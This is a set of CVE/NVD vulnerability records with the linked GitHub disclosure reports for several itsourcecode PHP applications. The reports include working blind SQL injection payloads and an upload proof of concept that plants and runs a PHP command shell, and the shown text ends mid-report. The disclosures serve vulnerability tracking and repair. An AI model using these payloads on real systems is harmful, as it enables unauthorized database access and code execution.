[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ppp-src/ha/issues/3" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266587" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266587" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.346223" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ppp-src/ha/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266587" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266587" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.346223" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:adonesevangelista:online_blood_bank_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4F53F723-1E87-4190-A902-24A47378C80B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ppp-src/ha/issues/3
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ppp-src", "ha" ]
# Itsourcecode "Online Blood Bank Management System" in PHP 1.0 "massage.php" SQL injection # NAME OF AFFECTED PRODUCT(S) + Online Blood Bank Management System in PHP with Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-blood-bank-management-system-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + noobes ## Vulnerable File + massage.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/02/Blood-Bank-Management-System-in-Php-with-Source-Code-1.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'massage.php' file of the 'Online Blood Bank Management System' project. The reason for this issue is that attackers inject malicious code from the parameter "bid" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the PHP "Online Blood Bank Management System", "noob" discovered a critical SQL injection vulnerability in the "massage.php" file. This vulnerability stems from insufficient user input validation of the "bid" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability type: + time-based blind + boolean-based blind ## Vulnerability location: + 'bid' parameter ## Payload: ``` Payload: ------WebKitFormBoundary5pVPM2sdw5QlXfOx ``` ```Parameter: MULTIPART bid ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: ------WebKitFormBoundary5pVPM2sdw5QlXfOx Content-Disposition: form-data; name="bid" 111' AND 4176=(SELECT (CASE WHEN (4176=4176) THEN 4176 ELSE (SELECT 4425 UNION SELECT 8954) END))-- CaXL ------WebKitFormBoundary5pVPM2sdw5QlXfOx Content-Disposition: form-data; name="signup" Send ------WebKitFormBoundary5pVPM2sdw5QlXfOx-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundary5pVPM2sdw5QlXfOx Content-Disposition: form-data; name="bid" 111' AND (SELECT 6421 FROM (SELECT(SLEEP(5)))gfjJ)-- BscZ ------WebKitFormBoundary5pVPM2sdw5QlXfOx Content-Disposition: form-data; name="signup" Send ------WebKitFormBoundary5pVPM2sdw5QlXfOx-- ``` + ![1](https://github.com/ppp-src/ha/assets/121587673/7d0a2bfd-51d3-4ec0-9de1-afa5db2b1e7b) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: + ![2](https://github.com/ppp-src/ha/assets/121587673/2692fdb6-04be-4273-b14a-b5cddd7cbe21) + ![3](https://github.com/ppp-src/ha/assets/121587673/3548a21a-f73a-47be-ac21-1ee1d900e5ca) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode "Online Blood Bank Management System" in PHP 1.0 "massage.php" SQL injection
https://api.github.com/repos/ppp-src/ha/issues/3/comments
0
2024-05-29T02:22:54Z
2024-05-29T02:22:54Z
https://github.com/ppp-src/ha/issues/3
2,322,218,913
3
6,043
CVE-2024-5517
2024-05-30T15:15:50.120
A vulnerability was found in itsourcecode Online Blood Bank Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file changepwd.php. The manipulation of the argument useremail leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266588.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ppp-src/ha/issues/4" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266588" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266588" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.346225" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ppp-src/ha/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266588" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266588" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.346225" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:adonesevangelista:online_blood_bank_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4F53F723-1E87-4190-A902-24A47378C80B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ppp-src/ha/issues/4
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ppp-src", "ha" ]
# Itsourcecode "Online Blood Bank Management System" in PHP 1.0 "changepwd.php" SQL injection # NAME OF AFFECTED PRODUCT(S) + Online Blood Bank Management System in PHP with Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-blood-bank-management-system-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + noobes ## Vulnerable File + changepwd.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/02/Blood-Bank-Management-System-in-Php-with-Source-Code-1.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'changepwd.php' file of the 'Online Blood Bank Management System' project. The reason for this issue is that attackers inject malicious code from the parameter "useremail" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the PHP Student Information Management System, noob discovered a critical SQL injection vulnerability in the "changepwd.PHP" file. This vulnerability stems from insufficient user input validation of the "useremail" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability type: + time-based blind ## Vulnerability location: + 'useremail' parameter ## Payload: ``` tab=on&useremail=1@qq.com' AND (SELECT 2484 FROM (SELECT(SLEEP(5)))iuyF) AND 'CqHW'='CqHW&sub=Submit Email ``` ```Parameter: useremail (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: tab=on&useremail=1@qq.com' AND (SELECT 2484 FROM (SELECT(SLEEP(5)))iuyF) AND 'CqHW'='CqHW&sub=Submit Email ``` + ![1](https://github.com/ppp-src/ha/assets/121587673/9d07aa9f-de77-48d2-8902-27da020c83a2) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: +![2](https://github.com/ppp-src/ha/assets/121587673/55906442-25c3-4336-8834-7c5b87b067d9) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
“Online Blood Bank Management System" in PHP 1.0 "changepwd.php" SQL injection
https://api.github.com/repos/ppp-src/ha/issues/4/comments
0
2024-05-29T02:27:59Z
2024-05-29T02:27:59Z
https://github.com/ppp-src/ha/issues/4
2,322,222,992
4
6,044
CVE-2024-5518
2024-05-30T16:15:19.327
A vulnerability classified as critical has been found in itsourcecode Online Discussion Forum 1.0. This affects an unknown part of the file change_profile_picture.php. The manipulation of the argument image leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266589 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/L1OudFd8cl09/CVE/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266589" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266589" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.346309" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/L1OudFd8cl09/CVE/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266589" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266589" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.346309" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:emiloimagtolis:online_discussion_forum:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "6BBF4F74-D6A3-4E10-AA60-6B1E1595C2D4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/L1OudFd8cl09/CVE/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "L1OudFd8cl09", "CVE" ]
# Itsourcecode Online Discussion Forum Project in PHP with Source Code v1.0 change_profile_picture.php Unrestricted Upload # NAME OF AFFECTED PRODUCT(S) + Online Discussion Forum Project in PHP with Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/online-discussion-forum-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + N3xu5Cr4ck37 ## Vulnerable File + change_profile_picture.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2015/11/bcc_forum.zip # PROBLEM TYPE ## Vulnerability Type + Unrestricted Upload ## Root Cause + In line 13 of the change_profile_picture.php file,The input obtained through $- FILES is directly used to determine the storage location of the file, without conducting a complete security check. The specific code snippet is as follows: <img width="633" alt="1" src="https://github.com/L1OudFd8cl09/CVE/assets/151617791/26ab63e8-e0a0-414f-af55-87b5250da8bc"> ## Impact + Attackers can exploit this vulnerability to upload malicious files without restriction, which can lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Exploiting malicious files can lead to remote attacks on RCE # DESCRIPTION + The file upload operation was triggered on line 13 of the "change_profile_picture.php" file, and the uploaded file was received using the "$- FILES" variable. Due to the lack of appropriate input validation and cleaning, remote attackers only need to use regular user login to pass malicious payloads through this file upload function, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE). # Vulnerability details and POC ``` POST /members/update_profile_picture.php HTTP/1.1 Host: 192.168.210.199:1218 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------10405231092695549021896513402 Content-Length: 260 Origin: http://192.168.210.199:1218 Connection: close Referer: http://192.168.210.199:1218/members/change_profile_picture_modal.php?id=65 Upgrade-Insecure-Requests: 1 Priority: u=1 -----------------------------10405231092695549021896513402 Content-Disposition: form-data; name="image"; filename="123.php" Content-Type: application/octet-stream <?php system("ipconfig"); ?> -----------------------------10405231092695549021896513402-- ``` <img width="911" alt="2" src="https://github.com/L1OudFd8cl09/CVE/assets/151617791/6cc4e50e-7ab4-4142-b86e-ba35dcd23e90"> ## I successfully executed the PHP script on the terminal ```bash curl http://192.168.210.199:1218/uploads/123.php ``` <img width="314" alt="3" src="https://github.com/L1OudFd8cl09/CVE/assets/151617791/ae264c2f-bb43-4b17-a382-687da278e305">
Itsourcecode Online Discussion Forum Project in PHP with Source Code v1.0 change_profile_picture.php Unrestricted Upload
https://api.github.com/repos/L1OudFd8cl09/CVE/issues/1/comments
0
2024-06-03T01:08:35Z
2024-06-03T01:27:33Z
https://github.com/L1OudFd8cl09/CVE/issues/1
2,329,970,193
1
6,045
CVE-2024-5519
2024-05-30T16:15:19.613
A vulnerability classified as critical was found in ItsourceCode Learning Management System Project In PHP 1.0. This vulnerability affects unknown code of the file login.php. The manipulation of the argument user_email leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-266590 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/L1OudFd8cl09/CVE/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266590" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266590" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.346310" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/L1OudFd8cl09/CVE/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.266590" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.266590" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.346310" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:itsourcecode:learning_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2C73EA1D-9BD1-42A6-8A1B-5517519304A8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/L1OudFd8cl09/CVE/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "L1OudFd8cl09", "CVE" ]
# Itsourcecode Learning Management System Project In PHP With Source Code v1.0 login.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Learning Management System Project In PHP With Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/learning-management-system-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + N3xu5Cr4ck37 ## Vulnerable File + login.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2020/07/e-learningsystem1.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'login.php' file of the 'Learning Management System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "user_email" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="533" alt="1" src="https://github.com/L1OudFd8cl09/CVE/assets/151617791/8cbaa6fc-0e10-4870-9371-5fa8c22f1f63"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input validation for the "user_email" parameter, a serious SQL injection vulnerability was discovered in the login function of the " Learning Management System Project In PHP", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ``` POST /e-learningsystem/login.php HTTP/1.1 Host: 192.168.210.199:1219 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 46 Origin: http://192.168.210.199:1219 Connection: close Referer: http://192.168.210.199:1219/e-learningsystem/login.php Upgrade-Insecure-Requests: 1 Priority: u=1 user_email=123231&user_pass=21312312&btnLogin= ``` ## Vulnerability type: + time-based 